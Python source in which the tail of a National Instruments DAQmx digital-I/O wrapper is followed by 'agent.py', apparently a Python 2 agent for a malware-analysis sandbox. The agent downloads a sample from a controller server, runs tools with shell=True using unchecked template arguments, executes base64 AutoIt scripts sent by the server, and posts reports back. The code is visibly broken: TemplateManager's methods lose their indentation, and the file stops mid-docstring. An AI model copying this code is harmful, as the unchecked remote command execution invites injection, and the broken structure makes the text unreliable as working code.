            DAQmxCreateDIChan(self.task, self.task_string, b"", DAQmx_Val_ChanPerLine)
            self.task_state = "init"
        if self.task_state in ["init", "stopped"]:
            self.start()

    def read(self):
        # One sample per line, interleaved; returns a numpy uInt8 array.
        self.init()
        data_arr = numpy.zeros(self.io_length, uInt8)
        samples_per_chan = int32()
        num_bytes_per_sample = int32()
        DAQmxReadDigitalLines(
            self.task,
            1,  # Samples per channel
            2.0,  # Timeout
            DAQmx_Val_GroupByScanNumber,  # Interleaved
            data_arr,
            len(data_arr),
            byref(samples_per_chan),
            byref(num_bytes_per_sample),
            None,
        )
        return data_arr
class BufferedWrite(DaqTask):
    """Hardware-clocked digital output: writes a whole sample buffer at a
    fixed sample frequency, then waits for completion."""

    def __init__(self, task_string, io_length, frequency):
        self.task_string = task_string
        # io_length: lines per sample; frequency: sample clock rate in Hz.
        self.io_length = io_length
        self.frequency = frequency

    def init(self):
        # Create the task once.  Unlike DigitalOut, the task is not started
        # here: write() autostarts it via DAQmxWriteDigitalLines.
        if self.task_state == "":
            self.task = TaskHandle()
            DAQmxCreateTask(b"", byref(self.task))
            DAQmxCreateDOChan(self.task, self.task_string, b"", DAQmx_Val_ChanPerLine)
            self.task_state = "init"

    def write(self, data):
        """
        The task should be in stopped state when calling write, it automatically starts the task through the
        DAQmxWriteDigitalLines call. When write is finished it is back in a stopped state
        :param data:
        :return:
        """
        self.init()
        try:
            if len(data) % self.io_length:
                raise ValueError(
                    "data must be a length divisible by {}".format(self.io_length)
                )
        except TypeError as e:
            raise ValueError(
                "data must be in an list divisible by {}".format(self.io_length)
            ) from e
        if len(data) == self.io_length:
            # Sample clock only works for more than one sample so duplicate the sample
            data = list(data)
            data.extend(data)
        DAQmxCfgSampClkTiming(
            self.task,
            None,  # None -> use the onboard sample clock
            float64(self.frequency),
            DAQmx_Val_Rising,
            DAQmx_Val_FiniteSamps,
            uInt64(int(len(data) // self.io_length)),
        )
        try:
            data_arr = numpy.zeros((len(data)), uInt8)
            data_arr[:] = data
            written = int32()
            DAQmxWriteDigitalLines(
                self.task,
                int(len(data) // self.io_length),  # samples per channel
                1,   # autostart the task
                -1,  # no timeout on the write
                DAQmx_Val_GroupByScanNumber,
                data_arr,
                written,
                None,
            )
            self.task_state = "running"
            # Block until the finite buffer has been clocked out.
            DAQmxWaitUntilTaskDone(self.task, -1)
            if written.value != len(data) // self.io_length:
                raise InstrumentError("Values not written correctly")
        finally:
            # Always leave the task stopped, even on error.
            self.stop()
class TwoEdgeSeparation(DaqTask):
    """Counter-input task measuring the time between two signal edges.

    trigger() arms the measurement on a worker thread (the DAQmx counter
    read blocks until both edges occur); read() joins that thread and
    returns the measured separation in seconds.
    """

    # Result of the last measurement.  NOTE(review): this is a class
    # attribute shared as a default; _read() fills it via byref per instance.
    _data = float64()
    _trigger_thread = None

    def __init__(
        self,
        device_name,
        counter_chan,
        min_val,
        max_val,
        first_edge_type,
        second_edge_type,
        source_terminal,
        destination_terminal,
    ):
        # min_val / max_val: expected measurement bounds in seconds.
        # first/second_edge_type: DAQmx_Val_Rising or DAQmx_Val_Falling.
        # source/destination_terminal: optional overrides for the counter's
        # default first/second input terminals (e.g. "PFI14").
        self.device_name = device_name
        self.counter_chan = counter_chan
        self.min_val = min_val
        self.max_val = max_val
        self.first_edge_type = first_edge_type
        self.second_edge_type = second_edge_type
        self.source_terminal = source_terminal
        self.destination_terminal = destination_terminal
        # Exceptions raised inside the worker thread are parked here and
        # re-raised by read().
        self._error_queue = Queue()
        self._thread_timeout = 10

    def init(self):
        # Create the counter channel and apply any terminal overrides.
        if self.task_state == "":
            self.task = TaskHandle()
            DAQmxCreateTask(b"", byref(self.task))
            DAQmxCreateCITwoEdgeSepChan(
                self.task,
                "{}/{}".format(self.device_name, self.counter_chan).encode(),
                b"",
                float64(self.min_val),
                float64(self.max_val),
                DAQmx_Val_Seconds,
                self.first_edge_type,
                self.second_edge_type,
                b"",
            )
            if self.source_terminal:
                tmp_data = c_char_p(self.source_terminal.encode())
                DAQmxSetCITwoEdgeSepFirstTerm(
                    self.task,
                    "{}/{}".format(self.device_name, self.counter_chan).encode(),
                    tmp_data,
                )
            if self.destination_terminal:
                tmp_data = c_char_p(self.destination_terminal.encode())
                DAQmxSetCITwoEdgeSepSecondTerm(
                    self.task,
                    "{}/{}".format(self.device_name, self.counter_chan).encode(),
                    tmp_data,
                )
            self.task_state = "init"

    def read(self):
        # Wait for the armed measurement (started by trigger()) to finish,
        # then surface any error the worker thread captured.
        self._trigger_thread.join(self._thread_timeout)
        if self._trigger_thread.is_alive():
            raise InstrumentError("Trigger thread failed to terminate")
        try:
            err = self._error_queue.get_nowait()
        except Empty:
            # no error in queue
            pass
        else:
            raise err
        # TODO: consider making this return self._data.value. We should return a python
        # float object, not a ctypes.c_double
        return self._data

    def _read(self):
        # Worker-thread body: the scalar counter read blocks until both
        # edges have been seen or the timeout elapses.
        try:
            DAQmxReadCounterScalarF64(
                self.task, float64(self._thread_timeout), byref(self._data), None
            )
        except Exception as e:
            self._error_queue.put(ThreadError(e))
            return

    def trigger(self):
        # Re-arm: tear down any previous task, make sure the old worker is
        # gone, then start a fresh measurement thread.
        if self._trigger_thread:
            self.clear()
            self._trigger_thread.join(self._thread_timeout)
            if self._trigger_thread.is_alive():
                raise InstrumentError("Existing Trigger Event in Progress")
        self.init()
        self._trigger_thread = ExcThread(target=self._read)
        self._trigger_thread.start()
class ThreadError(Exception):
    """Names an exception that originated inside a worker thread so the
    joining thread can re-raise it with context."""
class DaqMx:
    """
    Implements the digital input and output functions of the National Instruments DAQ
    usage:
    daq = DaqMx()
    # Create a digital output from port 0 line 2 to line 4 named 'P0.2:4'
    daq.create_digital_output('P0.2:4', port=0, range_start=2, length=3)
    # Create a digital output with default port 0, at line 7 named 'reset'
    daq.create_digital_output('reset', 7)
    # Create a digital input at port 0 line 1
    daq.create_digital_input('P0.1', range_start=1)
    # This example assumes that port 0 line 1 is shorted to port 0 line 7 named reset
    daq.start()
    print("Port 7:", daq["reset"], "Echo Port:", daq["P0.1"])
    >>>'Port 7: [0] Echo Port: [0]'
    daq["P0.7"] = 1 # or True or '1' or [1]
    print("Port 7:", daq["reset"], "Echo Port:", daq["P0.1"])
    >>>'Port 7: [1] Echo Port: [1]'
    print(daq["P0.2:4"])
    >>>'[0 0 0]'
    daq["P0.2:4"] = [0, 1, 0] # Need to assign all values if initialised as multiple
    print(daq["P0.2:4"])
    >>>'[0 1 0]'
    daq.stop()
    """

    def __init__(self):
        # NOTE(review): device name is hard-coded; assumes the DAQ enumerates
        # as "Dev1" in NI-MAX — confirm per deployment.
        self.device_name = "Dev1"
        self.tasks = {}  # ident -> DaqTask subclass instance
        self.reset()
        self.triggers = {}

    def reset(self):
        # Reset the physical device and mark every known task as uncreated
        # so it will be rebuilt on next use.
        DAQmxResetDevice(self.device_name.encode())
        for _, task in self.tasks.items():
            task.task_state = ""

    def signal_route(
        self,
        source_terminal,
        destination_terminal,
        disconnect=False,
        tri_state=False,
        invert=False,
    ):
        """
        Immediately routes a signal between two terminals
        Set destination_terminal to '' if tri_state output is required on the source_terminal
        terminals are PFI X as they are the programmable terminals.
        See NI-MAX Device Routes for available terminal names.
        Leave out the device name
        eg. /Dev 1/PFI0 would be PFI0
        """
        # Terminal names are qualified with the device name, e.g. "/Dev1/PFI0".
        source_terminal = "/{}/{}".format(self.device_name, source_terminal).encode()
        destination_terminal = "/{}/{}".format(
            self.device_name, destination_terminal
        ).encode()
        if disconnect:
            DAQmxDisconnectTerms(source_terminal, destination_terminal)
        elif tri_state:
            DAQmxTristateOutputTerm(source_terminal)
        else:
            if invert:
                invert = DAQmx_Val_InvertPolarity
            else:
                invert = DAQmx_Val_DoNotInvertPolarity
            DAQmxConnectTerms(source_terminal, destination_terminal, invert)

    def create_two_edge_separation(
        self,
        ident,
        counter_chan,
        min_val,
        max_val,
        first_edge_type,
        second_edge_type,
        source_terminal=None,
        destination_terminal=None,
    ):
        """
        Returns the two edge separation of two signals
        :param ident:
        Identification string used for reading the data via
        daq = DaqMx()
        daq.create_two_edge_separation(ident, **params)
        daq.trigger_measurement(ident)
        # Do stuff
        # Read the edge separation after causing the event
        edge_sep = daq[ident]
        :param counter_chan:
        For X-Series DAQs PCI
        'ctr0', 'ctr1', 'ctr2', 'ctr3' where the connected terminals are:
        Start = "AUX", Stop = "GATE"
        ctr0 ctr1 ctr2 ctr3
        Start: PFI 10 Pin45 Start: PFI 11 Pin46 Start: PFI 2 Pin43 Start: PFI 7 Pin38
        Stop: PFI 9 Pin3 Stop: PFI 4 Pin41 Stop: PFI 1 Pin10 Stop: PFI 6 Pin5
        :param min_val:
        The minimum value, in units, that you expect to measure.
        eg. 0.0001
        :param max_val:
        The maximum value, in units, that you expect to measure.
        eg. 0.83
        :param first_edge_type:
        The start trigger on the first edge
        "rising" or "falling"
        :param second_edge_type:
        The stop trigger on the second edge
        "rising" or "falling"
        :param source_terminal
        :param destination_terminal
        Override the default counter terminals.
        eg.
        ctr0
        eg. source_terminal = "PFI14" will make the Start pin as PFI 14 in stead of 10
        """
        if counter_chan not in ["ctr0", "ctr1", "ctr2", "ctr3"]:
            raise ValueError("Invalid counter channel selected")
        # Map the user-facing strings onto DAQmx edge constants; anything
        # other than "falling" is treated as rising.
        if first_edge_type.lower() == "falling":
            first_edge_type = DAQmx_Val_Falling
        else:
            first_edge_type = DAQmx_Val_Rising
        if second_edge_type.lower() == "falling":
            second_edge_type = DAQmx_Val_Falling
        else:
            second_edge_type = DAQmx_Val_Rising
        self.tasks[ident] = TwoEdgeSeparation(
            self.device_name,
            counter_chan,
            min_val,
            max_val,
            first_edge_type,
            second_edge_type,
            source_terminal,
            destination_terminal,
        )

    def trigger_measurement(self, ident):
        # Arm the named task's measurement (see TwoEdgeSeparation.trigger).
        try:
            self.tasks[ident].trigger()
        except KeyError as e:
            raise ValueError("{} is not a valid task".format(ident)) from e

    def create_buffered_write(self, ident, frequency, *dio_ranges):
        """
        Sets up the ranges to synchronize when writing to output at a specified frequency.
        This will force each write to the output for this ident to contain the amount of samples specified.
        eg.
        >>>daq = DaqMx()
        # Setup output @ 100Hz, 3 samples on port0 line 7 and 9
        >>>daq.create_buffered_write("MyOutput", 100, (0, 7, 7), (0, 9, 9))
        3 samples over 2 lines is 6 data values.
        >>>daq["MyOutput"] = [0 ,0, 1, 1, 0, 1]
        it is interleaved so it is written [line7, line9, line7, line9, line7, line9]
        Requires ports that enable buffered writes.
        In the X-Series daq this is port 0
        This disables reading from the output port for these pins.
        :param ident
        The identification used to access this message
        :param frequency
        The sample frequency for writing
        :type frequency integer or float
        :param io_ranges
        :type (port, line_start, line_end)
        :param samples
        The amount of samples that are required for each digital output write
        """
        if ident in self.tasks:
            raise ParameterError("Ident {} already used".format(ident))
        do_channel, data_length = self._build_digital_task_string(*dio_ranges)
        self.tasks[ident] = BufferedWrite(
            task_string=do_channel, io_length=data_length, frequency=frequency
        )

    def _build_digital_task_string(self, *dio_ranges):
        """
        :param dio_ranges:
        each dio_range is a tuple of ('port', 'range_start', 'range_end') or an IORange instance.
        :return:
        The string used to create the task by connecting each of the ports together,
        and the total number of lines covered by the ranges.
        """
        data_length = 0
        task_arr = []
        for rng in dio_ranges:
            task_arr.append(self.device_name + "/port{}/line{}:{}".format(*rng))
            data_length += rng[2] - rng[1] + 1  # range end - range start + 1
        return ", ".join(task_arr).encode(), data_length

    def create_digital_output(self, ident, *dio_ranges):
        """
        :param dio_ranges
        each dio_range is a tuple of ('port', 'range_start', 'range_end') or an IORange instance.
        A digital output is created in the order of the dio_ranges and can be accessed by the ident key.
        >>>daq = DaqMx()
        >>>rng_1 = IORange(0, 7, 9) # Port 0 line 7 to line 9
        >>>rng_2 = IORange(0, 11,11) # Port 0 line 11
        >>>daq.create_digital_output("MyOut", rng_1, rng_2)
        >>>daq["MyOut"] = [0, 1, 0, 1] # Port 0 Line 8 and 11 high
        >>>print(daq["MyOut"]) # Read back the value
        >>>[0, 1, 0, 1]
        """
        if ident in self.tasks:
            raise ParameterError("Ident {} already used".format(ident))
        task_string, data_length = self._build_digital_task_string(*dio_ranges)
        self.tasks[ident] = DigitalOut(task_string, io_length=data_length)

    def create_digital_input(self, ident, *dio_ranges):
        """
        :param dio_ranges
        each dio_range is a tuple of ('port', 'range_start', 'range_end') or an IORange instance.
        A digital input is created in the order of the dio_ranges and can be accessed by the ident key.
        >>>daq = DaqMx()
        >>>rng_1 = IORange(0, 7, 9) # Port 0 line 7 to line 9
        >>>rng_2 = IORange(0, 11,11) # Port 0 line 11
        >>>daq.create_digital_input("MyOut", rng_1, rng_2)
        >>>print(daq["MyOut"]) # Tie Port 0 line 8 and line 11 high
        >>>[0, 1, 0, 1]
        """
        if ident in self.tasks:
            raise ParameterError("Ident {} already used".format(ident))
        task_string, data_length = self._build_digital_task_string(*dio_ranges)
        self.tasks[ident] = DigitalIn(task_string, io_length=data_length)

    def __getitem__(self, ident):
        # daq[ident] delegates to the named task's read().
        return self.read(ident)

    def __setitem__(self, ident, data):
        # daq[ident] = data delegates to the named task's write().
        self.write(ident, data)

    def write(self, ident, value):
        try:
            return self.tasks[ident].write(value)
        except KeyError:
            # Unknown ident; re-raise with a clearer message.
            raise KeyError("{} is not a valid identifier".format(ident))

    def read(self, ident):
        try:
            return self.tasks[ident].read()
        except KeyError:
            # Unknown ident; list what is available to aid debugging.
            raise KeyError(
                "{} is not a valid identifier\nAvailable tasks: {}".format(
                    ident, sorted(self.tasks)
                )
            )

    def start_task(self, ident):
        """
        Start (creating if necessary) the task registered under ident.
        :param ident:
        :return:
        """
        self.tasks[ident].start()

    def stop_task(self, ident):
        """
        Stops a task so it can be restarted later without re-creating it.
        :param ident:
        :return:
        """
        self.tasks[ident].stop()

    def clear_task(self, ident):
        """
        Stops a task and clears up the resources allocated to it.
        :param ident:
        :return:
        """
        self.tasks[ident].clear()
|
agent.py
|
import shutil
import socket
import subprocess
import threading
import json
import pickle
import tempfile
import time
import box
import threading
import os
import base64
import getpass
import urllib
import requests
import zipfile
import sys
import pprint
import platform
# Emit verbose trace output throughout the agent when True.
DEBUG = True
# Command line: <template server IP> <template server port> <controller web port>
BPH_TEMPLATE_SERVER_IP = sys.argv[1]
BPH_TEMPLATE_SERVER_PORT = int(sys.argv[2])
BPH_CONTROLLER_WEB_PORT = int(sys.argv[3])
# Windows release string ("7" or "XP"); only these two platforms are supported.
running_os = platform.release()
if running_os == "7":
    APP_DATA = "C:\\Users\\{current_user}\\AppData\\Roaming\\".format(
        current_user=getpass.getuser())
    TMP_FOLDER = "C:\\Users\\{current_user}\\AppData\\Local\\Temp\\".format(
        current_user=getpass.getuser())
elif running_os == "XP":
    # To avoid tool issues when dealing with white-spaced paths.
    APP_DATA = "C:\\DOCUME~1\\{current_user}\\APPLIC~1\\".format(
        current_user=getpass.getuser())
    TMP_FOLDER = "C:\\DOCUME~1\\{current_user}\\LOCALS~1\\Temp\\".format(
        current_user=getpass.getuser())
else:
    print "Unsupported platform! Exiting..."
    sys.exit()
class FilterSpecialVars():
    """Expands @var@ placeholders (e.g. @appdata@, @sample@, @rid@) in a list
    of strings, using values drawn from the tool template plus optional
    user-supplied variables."""

    def __init__(self, unfiltered_data, template=None, custom_user_vars=None):
        # unfiltered_data should be a list
        self.unfiltered_data = unfiltered_data
        self.filtered_data = []
        # NOTE(review): template defaults to None but is dereferenced
        # unconditionally below — callers must always pass a template.
        self.special_vars = {
            '@appdata@': APP_DATA,  # os.path.expandvars('%appdata%'),
            '@temp@': TMP_FOLDER,
            '@toolname@': template['tool_name'],  # "peid"
            '@filename@': template.tool.filename,  # "peid.exe"
            '@rid@': template['rid'],
            '@md5@': template['md5'],
            # Sample paths are quoted so tools tolerate spaces.
            '@sample@': "\"" + ExecutionManager.sample_abs_path + "\"",
            '@sample_filename@': "\"" + os.path.basename(ExecutionManager.sample_abs_path) + "\"",
            '@tool_drive@': template['tool_drive'],
            '@tool_path@': os.path.join(template['tool_drive'], template['remote_tool_path'].replace('/','\\')),
            '@tool_abs_path@': os.path.join(template['tool_drive'], template['remote_tool_path'],
                                            template.tool.filename),
            '@report_folder@': os.path.join(APP_DATA, template['rid'], template['tool_name'])
        }
        if custom_user_vars != None:
            self.custom_user_vars_filter(custom_user_vars)

    def custom_user_vars_filter(self, custom_user_vars):
        # Merge user variables in as @key@ entries (may override built-ins).
        if DEBUG: print "Custom User Vars Filtering: {}".format(custom_user_vars)
        for k, v in custom_user_vars.items():
            key = "@{}@".format(k)
            self.special_vars.update({key: v})
        if DEBUG: print self.special_vars

    def filter_now(self):
        # Substitute every known placeholder in every non-empty input string;
        # results accumulate in self.filtered_data.
        def do_filter(unfiltered_string):
            for k, v in self.special_vars.items():
                if k in str(unfiltered_string):
                    unfiltered_string = unfiltered_string.replace(k, v)
                    if DEBUG: print ">> Found: {}".format(unfiltered_string)
            return unfiltered_string
        for unfiltered_string in self.unfiltered_data:
            if len(unfiltered_string) != 0:
                if DEBUG: print "### Searching Variable ###: {}".format(unfiltered_string)
                self.filtered_data.append(do_filter(unfiltered_string))
                if DEBUG: print self.special_vars
        if DEBUG:
            print"FILTERED: {}".format(self.filtered_data)
        # return " ".join(self.filtered_data)
class File(object):
    """File helpers shared by the agent: random names and zip packaging."""

    def __init__(self):
        pass

    def generate_random_file_name(self):
        # 10 random uppercase letters/digits; used for temp artifact names.
        import string
        import random
        return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(0, 10))

    def zip_file(self, file_abs_path, seconds=5):
        """Compress file_abs_path into <name>.zip alongside it and return the
        zip file name, or None on failure.  .log/.zip files are skipped.
        Retries (recursively) while the source file is still locked."""
        if not file_abs_path.endswith('.log') and not file_abs_path.endswith('.zip'):
            if DEBUG: print "Creating compressed (zip) archive: {}".format(file_abs_path)
            #time.sleep(5)
            try:
                zip_filename = "{}.zip".format(os.path.basename(file_abs_path))
                if DEBUG: print zip_filename
                original_filename = os.path.basename(file_abs_path)
                if DEBUG: print original_filename
                path_location = os.path.dirname(file_abs_path)
                if DEBUG: print path_location
                zip_file_abs_path = "{}\\{}".format(path_location, zip_filename)
                if DEBUG: print zip_file_abs_path
                # NOTE(review): zf is never explicitly closed; the archive is
                # presumably flushed when the object is collected — confirm.
                zf = zipfile.ZipFile(zip_file_abs_path, 'w', zipfile.ZIP_DEFLATED)
                # When a file is bein created as compressed file (zip), in some cases
                # the set delay time is not enough and file-access errors appears.
                # To avoid such situation, several attempts are made until the access
                # to the source file is ready.
                try:
                    zf.write(file_abs_path, os.path.basename(file_abs_path))
                except IOError:
                    if DEBUG: print "Target file is still in use... attempting in ({}) seconds".format(seconds)
                    time.sleep(seconds)
                    self.zip_file(file_abs_path)
                else:
                    if DEBUG: print "Zip file creation - Done."
            except OSError as e:
                if DEBUG: print "Error when setting up info for target zip file: {}".format(e)
                raise
            else:
                # NOTE(review): bare expression — has no effect; looks like a
                # leftover from an earlier edit.
                zipfile.ZIP_DEFLATED
                if os.path.isfile(zip_file_abs_path):
                    if DEBUG: print "Zip file ok: {}".format(zip_file_abs_path)
                    # os.remove(file_abs_path)
                    return zip_filename
                else:
                    if DEBUG: print "Zip file can't be created"
                    return None
class AutoItScript(File):
    """Materializes automation data (a list of script lines) into an AutoIt
    script file under APP_DATA; the path ends up in self.autoit_script."""

    def __init__(self, automation_data):
        self.autoit_script = None
        self.__base64totmp(automation_data)

    def __base64totmp(self, automation_data):
        # Write each line of the (already decoded) automation data to a
        # randomly named file.  Name kept from the original base64 workflow.
        if DEBUG: print "Converting from base64 file data to Auto-it Script"
        tmp_au_script_abs_path = os.path.join(
            APP_DATA, self.generate_random_file_name())
        with open(tmp_au_script_abs_path, 'w+') as tmp_au_script:
            for _ in automation_data:
                if DEBUG: print "Writing: {}\n".format(_)
                tmp_au_script.write(_)
        self.autoit_script = tmp_au_script_abs_path
class DownloadedFile(File):
    """Computes where a file fetched from download_url will live on disk."""

    def __init__(self, download_url):
        self.download_dir = APP_DATA
        self.fake_file_name = self.generate_random_file_name()
        self.original_file_name = os.path.basename(download_url)
        self.extension = os.path.splitext(download_url)[1].replace('.', '')
        #self.abs_path = os.path.join(self.download_dir, "{}.{}".format(
        #    self.fake_file_name, self.extension))
        # The original (URL) file name is kept rather than the random one.
        self.abs_path = os.path.join(self.download_dir, self.original_file_name)
        if DEBUG:
            print self.abs_path
class ExecutionManager(object):
    """Downloads the sample and runs the requested tool — directly with
    parameters, via an AutoIt automation script, or both in cascade."""

    # Shared across instances: where reports go and where the downloaded
    # sample lives (also read by FilterSpecialVars).
    report_path = ""
    sample_abs_path = ""

    #### Agent Command Control ######
    def execute_tool(self, **cmd_data):
        # Build "<drive><path>\<tool>" (quoted for spaces), append the
        # already-filtered arguments, and run it through the shell.
        if DEBUG:
            print cmd_data
        tool_drive = cmd_data['tool_drive']
        tool_path = cmd_data['tool_path'].replace('/', '\\')
        tool_name = cmd_data['tool_name']
        tool_abs_path = "\"{tool_drive}{tool_path}\\{tool_name}\"".format(
            tool_drive=tool_drive,
            tool_path=tool_path,
            tool_name=tool_name,
        )
        if DEBUG:
            print tool_abs_path
        tool_args = cmd_data['tool_args']
        if DEBUG:
            print tool_args
        cmd = "{} {}".format(tool_abs_path, tool_args)
        if DEBUG:
            print cmd
            print "\nExecuting Cmd: {}\n".format(cmd)
        subprocess.call(cmd, shell=True)

    def exec_manager(self, **cmd_data):
        # Run execute_tool on a thread named after the tool; the thread name
        # is later matched against threading.enumerate() to detect completion.
        if DEBUG:
            if DEBUG: print "\nExecuting Thread with data: {}\n".format(cmd_data)
        thread_name = cmd_data['tool_name']
        thread = threading.Thread(target=self.execute_tool, name=thread_name, kwargs=cmd_data)
        thread.start()

    def write_tmp_file(self, datatowrite, sample_abs_path):
        # Persist downloaded bytes to sample_abs_path; returns the path on
        # success, False otherwise.
        try:
            if DEBUG: print "Writing Tmp file: {}".format(sample_abs_path)
            with open(sample_abs_path, 'wb+') as f:
                f.write(datatowrite)
        except:
            if DEBUG: print "Error while creating the tmp file."
        else:
            if DEBUG: print "Done."
            if os.path.isfile(sample_abs_path):
                if DEBUG: print "Temp file created correctly."
                # Destination folder is created this way because because
                # some tools shows weird behaviors when passing arguments
                # For instance, CFF Explorer does not work correctly when
                # the file agument resides on a directory with whitespaces.
                # The workaround is to use DOS version of the path.
                #fixed_sample_abs_path = sample_abs_path.split('\\')
                #fixed_sample_abs_path[1] = "docume~1"
                #fixed_sample_abs_path[3] = "applic~1"
                # print fixed_sample_abs_path
                # Setting up Class attribute for sample path
                return sample_abs_path
        return False

    def download_file(self, download_url):
        # Fetch the sample from the BPH webserver and store it under APP_DATA.
        # Returns the written path or False.
        if DEBUG: print "Downloading: {}".format(download_url)
        try:
            import urllib2
            filedata = urllib2.urlopen(download_url)
        except urllib2.URLError:
            if DEBUG: print "Can't download the target sample file. Make sure BPH Webserver is running on the host."
            return False
        else:
            datatowrite = filedata.read()
            sample_abs_path = DownloadedFile(download_url).abs_path
            # Used when filtering custom variables
            ExecutionManager.sample_abs_path = sample_abs_path
            if DEBUG: print "Downloaded file: {}".format(sample_abs_path)
            return self.write_tmp_file(datatowrite, sample_abs_path)

    def execute_autoit_script(self, template, auto_it_script_abs_path):
        # The previously generated AutoIT script will be executed.
        if DEBUG: print "Executing Auto-It script"
        self.exec_manager(
            tool_drive=template.tool_drive,
            tool_path='misc\\autoitv3\\',
            tool_name='AutoIt3.exe',
            tool_args=auto_it_script_abs_path)

    def tool_execution(self, template):
        """Resolve the template's active action into filtered parameters
        and/or an automation script, then run whichever are present."""

        def selected_execution(filtered_parameters, filtered_automation):
            # Parameters only, automation only, or both ("cascade": launch
            # the tool, wait, then drive it with AutoIt).
            cascade_execution = False
            if filtered_parameters is not None and filtered_automation is not None:
                if DEBUG: print "Cascaded Execution Detected: parameters -> autoit"
                cascade_execution = True
            if filtered_parameters is not None:
                if DEBUG: print "Parameter Execution Detected"
                self.exec_manager(
                    tool_drive=template.tool_drive,
                    tool_path=template.remote_tool_path,
                    tool_name=template.tool.filename,
                    tool_args=filtered_parameters
                )
            if filtered_automation is not None:
                # If cascase execution is set, then a delay between tool execution
                # and automation is also set. This to allow the tool to properly
                # load and the automation be able to run properly. A default value
                # of 5 seconds was given.
                if cascade_execution:
                    if DEBUG: print "Cascade Execution Delay - Running now..."
                    time.sleep(5)
                if DEBUG: print "Automation-Only Execution Detected"
                # NOTE(review): custom_user_vars is unused here — filtering
                # already happened in filter_custom_vars below.
                custom_user_vars = template.configuration.execution.custom_user_vars
                auto_it_script_abs_path = AutoItScript(filtered_automation).autoit_script
                self.execute_autoit_script(template, auto_it_script_abs_path)

        def filter_custom_vars(template, filter_type=None):
            # Handling template parameters custom vars
            # Returns the filtered parameters/automation for the active
            # action, or None when the action defines none.
            if filter_type is not None:
                custom_user_vars = template.configuration.execution.custom_user_vars
                if filter_type == "parameters":
                    parameters = template.actions[template.actions.action]['parameters']
                    if parameters is not None:
                        if DEBUG: print "Parameters: {}".format(parameters)
                        if len(custom_user_vars) != 0:
                            if DEBUG: print "Custom Parameters Vars {} - Parameters({})".format(custom_user_vars, parameters)
                            filtered_parameters = self.filter_variables(
                                parameters, template, filter_type='parameters', custom_user_vars=custom_user_vars)
                        else:
                            filtered_parameters = self.filter_variables(
                                parameters, template, filter_type='parameters', custom_user_vars=None)
                        return filtered_parameters
                if filter_type == "automation":
                    automation = template.actions[template.actions.action]['automation']
                    if automation is not None:
                        if DEBUG: print "Automation: {}".format(automation)
                        if len(custom_user_vars) != 0:
                            if DEBUG: print "Custom Automation Vars {}".format(custom_user_vars)
                            filtered_automation = self.filter_variables(
                                automation, template, filter_type='automation', custom_user_vars=custom_user_vars)
                        else:
                            filtered_automation = self.filter_variables(
                                automation, template, filter_type='automation', custom_user_vars=None)
                        return filtered_automation

        action_name = template.actions.action
        if DEBUG: print "Executing: {}".format(action_name)
        filtered_parameters = filter_custom_vars(template, filter_type='parameters')
        filtered_automation = filter_custom_vars(template, filter_type='automation')
        selected_execution(filtered_parameters, filtered_automation)
class TemplateManager(ExecutionManager):
def __init__(self, template):
    """Process one tool request: create the per-request report folders,
    optionally download the sample, execute the tool, wait for it (and any
    AutoIt automation) to finish, then collect report files."""
    # self.report_directory_check(template.vm_report_name)
    if DEBUG: print "#"*50
    if DEBUG: print dict(template)
    if DEBUG: print "#"*50
    # Each tool request must save files. Those can be either a log file
    # or output files from its execution. This "report path" folder will
    # be created per request.
    #
    # The /files/ folder will be used to store any additional files generated
    # by the tool.
    self.report_path_files = os.path.join(
        APP_DATA, template.rid, template.tool_name, 'files')
    self.report_path = os.path.join(
        APP_DATA, template.rid, template.tool_name)
    if not os.path.isdir(self.report_path_files):
        if DEBUG: print "Creating: {}".format(self.report_path_files)
        os.makedirs(self.report_path_files)
    if template.configuration.execution['download_sample']:
        self.download_file(template.download_url)
    # Tool execution will eventually select which execution type will be run,
    # either automated or manual (only based in parameters)
    self.tool_execution(template)
    # Delay (seconds) between tool executions.
    exec_delay = template.configuration.execution.delay
    if DEBUG: print "Execution Delay (in seconds): {}".format(exec_delay)
    time.sleep(exec_delay)
    # Poll the live thread names once a second until the tool (and AutoIt,
    # if any) is deemed finished; the rule differs for background tools.
    while True:
        if DEBUG: print threading.active_count()
        if DEBUG: print threading.enumerate()
        threads = str(threading.enumerate()).lower()
        if template.configuration.execution.background_run:
            if DEBUG: print "TOOL DOES RUN IN BACKGROUND..."
            if template.tool.filename.lower() in threads:
                # FIXED: This allows more than one tool running in background
                if threading.active_count() != 1:
                    if "autoit" not in threads:
                        if DEBUG: print "TOOL RUN CHECK DONE"
                        break
        else:
            if DEBUG: print "TOOL DOES NOT RUN IN BACKGROUND..."
            if template.tool.filename.lower() not in threads:
                if "autoit" not in threads:
                    if DEBUG: print "TOOL RUN CHECK - DONE"
                    break
        time.sleep(1)
    if DEBUG: print "\n###### Tool execution has ended #######\n"
    if DEBUG: print threading.active_count()
    if DEBUG: print threading.enumerate()
    if template.configuration.reporting.report_files:
        if DEBUG: print "########## Starting COLLECTING HTTP FILES ##############"
        self.report(template)
def filter_variables(self, data, template, filter_type=None, custom_user_vars=None):
    """Expand @var@ placeholders in parameter strings or automation blobs.

    parameters: space-separated string in, joined string out.
    automation: base64 blob in, list of decoded lines out.
    """
    if filter_type == "parameters":
        # Convert into list here.
        data = data.split(' ')
    if filter_type == "automation":
        # Decode first, then convert into a list.
        data = base64.decodestring(data).split('\n')
    if DEBUG: print "Filtering Variables: {}".format(data)
    unfiltered_data = FilterSpecialVars(data, template=template, custom_user_vars=custom_user_vars)
    unfiltered_data.filter_now()
    if DEBUG: print "Filtered Args: ({})".format(unfiltered_data.filtered_data)
    if filter_type == "parameters":
        return " ".join(unfiltered_data.filtered_data)
    if filter_type == "automation":
        return unfiltered_data.filtered_data
def report_back(self, report_data):
    """Upload one collected file to the controller's report.php endpoint,
    together with its request/tool metadata."""
    url = "http://{}:{}/bph/report.php".format(BPH_TEMPLATE_SERVER_IP, BPH_CONTROLLER_WEB_PORT)
    # NOTE(review): the file handle is never closed explicitly.
    files = {'file': open(report_data['file_abs_path'], 'rb')}
    response = requests.post(url, data={'project_name': report_data['project_name'],
                                        'md5': report_data['md5'],
                                        'sid': report_data['sid'],
                                        'tool': report_data['tool_name'],
                                        'rid': report_data['rid'],
                                        'file': report_data['file'],
                                        'dir': report_data['dir']}, files=files)
    if DEBUG: print "Response: {}".format(response.text)
    def report_files(self, base_folder, tool_name):
        """Poll ``base_folder`` until output appears, then collect it.

        Walks the tree and returns a list of entries shaped
        ``[absolute_path, file_or_zip_name, dir_component, ...]``:
        top-level ``*.log`` files are taken as-is, every other file is
        zipped first (big files upload poorly over HTTP).

